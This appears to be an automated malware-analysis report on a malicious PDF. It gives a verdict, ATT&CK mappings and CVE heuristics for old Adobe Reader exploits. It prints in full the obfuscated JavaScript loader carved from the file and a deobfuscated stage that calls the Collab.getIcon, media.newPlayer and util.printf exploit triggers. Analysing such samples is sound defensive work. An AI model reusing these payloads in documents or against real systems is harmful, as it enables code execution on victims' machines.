Verdict: MALICIOUS (Risk Score 348)

Malware Insights

MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
- T1566.001 Spearphishing Attachment
The PDF file contains obfuscated JavaScript that leverages multiple known Adobe Reader vulnerabilities, including CVE-2008-2992, CVE-2009-4324, and CVE-2009-0927. The script utilizes functions like Collab.getIcon, media.newPlayer, and util.printf, indicating an attempt to execute arbitrary code. This pattern is consistent with a malicious PDF designed to download and run a secondary payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9953
Heuristics (8)
- media.newPlayer — CVE-2009-4324 [critical, CVE exact, CVE_2009_4324]: PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 [critical, CVE exact, CVE_2008_2992]: PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher [critical, CVE likely, PDF_PIDIEF_MULTI_CVE_DISPATCH]: A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- Hex-obfuscated scripting name object [critical, PDF_OBFUSCATED_NAME_OBJECT]: A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
- Multi-CVE Adobe Reader JavaScript exploit kit [critical, PDF_ADOBE_READER_MULTI_CVE_JS_KIT]: One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action [low, 1 related finding, PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream [low, PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0011_000.js | pdf-javascript-stream | PDF /JS object 11 at offset 0x1342 | 2272 bytes |
| legacy_pdfkit_stage_000.js | deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 153 bytes |

Artifact: javascript_obj0011_000.js

SHA-256: 437a5d40b54247c17dfb3ac60e39d3ecfad672a269694af1851a077d9726a8d2

Preview script (first 1,000 lines of the extracted script):

```javascript
var uHQD = null;try {var nM=/[9k~&]/g;var xMT="len"+"gth";var dYZ=0;var gNCL="va~r& ~o&J~AkJ~=9tkhkiks~.~z9K~R9;&dkG9=k\'&gke~tkP&a9g~ekN&\'k;&ikV~U~Z&=kd~Gk+9\'kt9hkW9o&r&d9\'k;9l&=9d~G&+9\'~ukmkW~o9r9dksk\'&;&tkO9B9=~\'&p9a~gke9N9u9mk\'k;&h9G&H& &=9 ~7k8k 9;kv~GkTk=9\'&\'~;kh9GkT9=k\'9jko9i&n9\'&;~ekXkK&Z&=k\'k\'~;9d&Y~Z9=&0&;&x~K&N~=kSktkrki~n&gk;&t9WkJ&=&\'ks&ukbks9t&rk\'~;&l&U&Xk=k\'ke9v9aklk\'9;&xkMkT9=9\'~l9e~nkgktkh&\'9;~pkQ~X9=&\'&\\9\\kx~\'k;9n&=9\'kt~o&S9t&rki~nkg9\'&;&f~Q~Lk=~\'~pka9rks9ekIkn9t~\'k;~n&A9Zk=~\'9f&r9okm9C&hka9r~Cko9dkek\'k;&v~EkF9=~\'&c&h9akr9Cko9d&e9A9t&\'9;kx9QkR&=&49/&49;9f~I&T~=91~+k4~;9xkM~Z&=&2k0~0k+9595&;&j&W&X&=9\'&d~o~c9\'&;9lkO~F9=93k3~2&;kj~I&P~=~[~]9;9dkW~=k\'~\'k;~t9K9Z&=k196k;9z9I9Z9=k29;kr~G~Jk=94&;~t9I&D&=9o&J&A~Jk[~lk]k(kokJ&A~J~[kt&O~B9]9)9;kf&o&r&(~lkO&H~=kdkY9Z9;~lkO&H&<9 &tkIkD~;k ~l~O&H&+&+9)k{9v9akrk 9tkU~P~=&o~J&AkJ~[9i9VkUkZk]k(~o&JkA&J&[&tkO&B~]9,&lkO&H~,kt~r&uke~)k;kekX~K~Z~=&[ke~X9K~Zk,kt~UkP~]9[~h9G&T9]&(~v~GkT&)9;~;~}kf9o&r9(~l~O~H9=909;&l9O~H9 k<~ ke9X&K&Z9[&x9M9T9]9;~ &l&O9H9+~=9z~I~Z&)9{~lkC&T&=~e&XkK9Z~[9t9W~J9]~(~l&O~H9,&z~I9Z&)&;&l9U9P9=kpka&r&s&e~I&n&t9(9l~C&T&,kt&KkZk)~;kzkGkXk=klkU&P9^9h~G&H&;~l~G&Vk=~zkG&X9.9t9okS9t~r~i&n&g9(&t&KkZ9)9;&l9G~V9=9(&l~G&Vk[~xkM9Tk]9=k=9x~Q~R9)k &?k k\'k09\'k 9+k ~l~G&V~ &:& kl~G&Vk;kj9I~P&.kp9uks&h~(~l&G~V9)~;9}~t&r~y9 k{kd~Wk=kn9e~w9 kS&t9rki9n~g~(kp~Q9X~ 9+9 &j~IkP~[kh~GkTk]~(kp&Q&X9)9)9;9a&p&p~[~l&U&X9]k(9\'&d9Wk=~\"&\'9+9dkW~+k\'&\"9;~\'k)k;&o9J~AkJ~.&z&Y~L9=k(&d~W9[~tkW~J&]k(&d~W~[&xkM~T9]&-~l~OkF9)9)~;&o9J9A~Jk.kz9I&L&=k(&d&W9[9t~W&Jk]~(kd9Y&Zk,kdkWk[9x~MkT&]k-&lkO9F~)~)k;kz9G&T&(k)~;k}9 &ckakt&c9h&(kz&YkV9)~{&i&f~(&o9J9A&J9.kzkI~Lk)~{&t9r9yk k{ka&pkp~[&l~U&Xk]&(ko9J&A&J&.9z&IkLk)9;k}& &c~a~t9ckhk(~z9Y&V~)9{~akp&p~.9a&lkekr&tk(kz9Y&V9)k;&}9}~ ~ekl9s&e~ ~{&a~p9p~.kakl9e9r&t&(~\'~N9O& &C&O~D~E&\'~)9;9}9}9";var h=11+44;var xQR=2-1;function lOX(zUF){fSR='';for(lOH=zUF.length;lOH >=0;lOH--)fSR+=zUF.charAt(lOH);return fSR;}var jWX=this;var hQJ=new 
String("Func"+"tion");function jMX(zKD){this.zKR=zKD;this.dQZ=zKD;};;dOP=lOX("epy"+"tot"+"orp");gNCL=gNCL.replace(nM, '');lUX=lOX("lave");;jMX[dOP]={tUD : function(vWZ){if(vWZ > h){this.zKR[lUX](gNCL);} else {uHQD.tUD(vWZ+xQR);}},};var uHQD=new jMX(jWX);uHQD.tUD(dYZ);} catch(dW){app.alert(dW);}
```

Artifact: legacy_pdfkit_stage_000.js

SHA-256: 18699f9d55ae1f1fd22bc427d0f09ac790fd8fafb1557dc66370fe40318c5f52

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):

```javascript
/* getPageWords-XOR Pidief stage normalized */
app.viewerVersion;
Collab.getIcon("N."+unescape("%09"));
media.newPlayer(null);
util.printf("%45000f", 1);
```